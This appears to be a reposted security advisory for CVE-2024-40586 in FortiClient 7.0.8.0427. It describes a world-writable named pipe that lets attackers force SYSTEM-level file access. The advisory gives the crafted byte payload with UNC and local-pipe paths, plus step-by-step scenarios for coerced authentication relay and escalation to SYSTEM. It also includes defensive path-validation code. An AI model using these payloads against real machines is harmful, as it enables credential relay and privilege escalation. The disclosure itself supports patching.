FortiClient Windows Coerced Authentication Vulnerability

Vulnerability Information

Vulnerability name: FortiClient Windows Coerced Authentication Vulnerability

Vulnerability ID:

  • CVE: CVE-2024-40586

Vulnerability type: Privilege escalation

Severity: High

Vulnerability description: FortiClient is a multi-function security client from Fortinet, widely used in enterprise environments to provide VPN, endpoint protection and other functions. It is very common in enterprise deployments, where it secures remote work and data transfer. The vulnerability found here lies in FortiClient's FortiSSLVPNdaemon service: a named pipe (FortiSslvpnNamedPipe) allows any user to read and write, which leads to a coerced authentication vulnerability on Windows systems.

The technical root cause is that FortiClient fails to properly validate and restrict user permissions when handling data received over the named pipe. Specifically, when the op code is 24, the application reads the contents of a file but does not adequately validate the file path; an attacker can exploit this by constructing a specific packet to force the FortiSSLVPNdaemon process to perform file operations with SYSTEM privileges. This includes connecting to a remote file or a local named pipe, thereby triggering coerced authentication or privilege escalation.

The security impact of this vulnerability is severe. An attacker can use it for a variety of attacks, including but not limited to forcing a Windows host to authenticate to an attacker-controlled machine (Scenario 1) and escalating from a local user to SYSTEM privileges (Scenario 2). These attacks do not require the attacker to hold high privileges and can be executed remotely, greatly increasing the security risk to enterprise networks. In particular, an attacker can use the vulnerability for relay attacks or authentication downgrade attacks, further widening the scope and impact. The vulnerability is therefore rated high severity, and all users of affected FortiClient versions are advised to update to a fixed version as soon as possible.

Vendor: Fortinet

Product: FortiClient

Affected version: 7.0.8.0427

Source: https://github.com/Hagrid29/CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient

Type: CVE-2024:github search

Repository files

  • README.md
  • img
  • poc-forticlient

Source overview

CVE-2024-40586 Windows Coerced Authentication in FortiClient

On Windows systems, it was found that FortiClient (app version 7.0.8.0427) allows a remote unprivileged user to coerce Windows hosts into authenticating to other machines via a named pipe belonging to the FortiSSLVPNdaemon service.

It was observed that the named pipe “FortiSslvpnNamedPipe” allows READ and WRITE from any user.

Fig1

Analysis

The app reads the 5th byte of the buffer received from the named pipe as the op code (PipeBuffer+4).

Fig2

It was observed that the app will read a file if the op code equals 24 (i.e., 0x18).
Code flow: Case 24 => LABEL_26 => strncpy copies the payload into the variable Buffer => the payload is passed to sub_7FF60C3EAC20 => CreateFileA is called => ReadFile
Fig3

Fig4

Fig5

However, the application does nothing with the file content.

Exploit

We can send crafted traffic (i.e., “\x00\x00\x00\x00\x18\x00” concatenated with the target path) to the vulnerable named pipe “FortiSslvpnNamedPipe” to trigger op code 24 and force the process “FortiSSLVPNdaemon.exe” to call CreateFileA with SYSTEM privileges. Therefore, we can force the server to connect to a remote file by submitting a UNC path (e.g., “\\<remote ip>\<file path>”) or to a local named pipe (e.g., “\\127.0.0.1\pipe\<named pipe>”).
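As an added example (not code from the repository or the write-up), the following Python models the message layout described in the analysis above and implements the path validation the daemon lacks: only a normalised, absolute drive-letter path under an allow-listed directory is accepted, so the UNC and named-pipe forms that make CreateFileA reach another host or a local pipe are rejected. The 6-byte header layout follows the write-up; the allow-listed directory `ALLOWED_ROOT` and the function names are assumptions.

```python
import ntpath
import re

# Op code that the daemon dispatches to CreateFileA/ReadFile, per the write-up.
OP_READ_FILE = 0x18

# Hypothetical allow-list root (assumption): the daemon should only open its own files.
ALLOWED_ROOT = r"C:\Program Files\Fortinet\FortiClient"

_DRIVE_RE = re.compile(r"^[A-Za-z]:$")


def parse_pipe_message(buf: bytes):
    """Split a pipe message into (op code, payload) using the layout in the write-up:
    bytes 0-3 header, byte 4 op code, byte 5 header, then the payload. The payload is
    cut at the first NUL because the daemon copies it with strncpy."""
    if len(buf) < 6:
        raise ValueError("message shorter than the 6-byte header")
    return buf[4], buf[6:].split(b"\x00", 1)[0]


def is_safe_file_path(path: str, root: str = ALLOWED_ROOT) -> bool:
    """The check the daemon lacks: accept only a normalised, absolute drive-letter
    path inside `root`. Anything that would make CreateFileA reach a UNC share
    (\\\\host\\share, \\\\?\\UNC\\...) or a named pipe (\\\\.\\pipe\\, \\\\127.0.0.1\\pipe\\)
    has a drive component starting with two separators and fails the drive check."""
    norm = ntpath.normpath(path)          # collapses '..' and turns '/' into '\\'
    drive, _ = ntpath.splitdrive(norm)
    if not _DRIVE_RE.match(drive):        # UNC/device "drives" are not a drive letter
        return False
    if not ntpath.isabs(norm):            # rejects drive-relative paths such as 'C:foo'
        return False
    root_norm = ntpath.normpath(root)
    try:                                  # commonpath raises on different drives
        return ntpath.commonpath([root_norm, norm]).lower() == root_norm.lower()
    except ValueError:
        return False


def handle_message(buf: bytes, root: str = ALLOWED_ROOT) -> str:
    """Dispatch one message the way a hardened daemon would: 'open' only for a
    validated path, 'reject' for op code 24 with a bad path, 'ignore' otherwise."""
    op, payload = parse_pipe_message(buf)
    if op != OP_READ_FILE:
        return "ignore"
    return "open" if is_safe_file_path(payload.decode("latin-1"), root) else "reject"
```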

Scenario 1

To coerce a Windows host into authenticating to another machine as a remote unauthenticated user, follow these steps:

  1. On the attacker machine, start a listener to receive the coerced authentication.
  2. On the attacker machine, send the crafted payload (i.e., “\x00\x00\x00\x00\x18\x00” + “\\<attacker IP>\fake\fake”) to the vulnerable named pipe of the victim machine, “\\<victim IP>\pipe\FortiSslvpnNamedPipe”, to force the process to connect to a remote file with the UNC path “\\<attacker IP>\fake\fake”.
  3. As with other coerced authentication attacks (e.g., SpoolSample), the attacker could then perform a relay attack or an authentication downgrade attack.

Fig6

Scenario 2

To perform privilege escalation to SYSTEM from a local user holding “SeImpersonatePrivilege” (e.g., “nt authority\network service”), follow these steps:

  1. Create a named pipe server that waits for a connection.
  2. Send the crafted payload (i.e., “\x00\x00\x00\x00\x18\x00” + “\\127.0.0.1\pipe\<pipe server>\XXX”) to the local vulnerable named pipe “\\.\pipe\FortiSslvpnNamedPipe” to force the process to connect to our named pipe server.
  3. After the connection comes in, call ImpersonateNamedPipeClient() to impersonate SYSTEM.

Fig7

Timeline

  • 07/09/2023 - Vulnerability reported to Fortinet
  • 08/30/2023 - Fortinet confirmed vulnerability
  • 02/11/2024 - Publication

Reference


http://example.com/2025/07/24/github_3687467491/
Author: lianccc
Published: July 24, 2025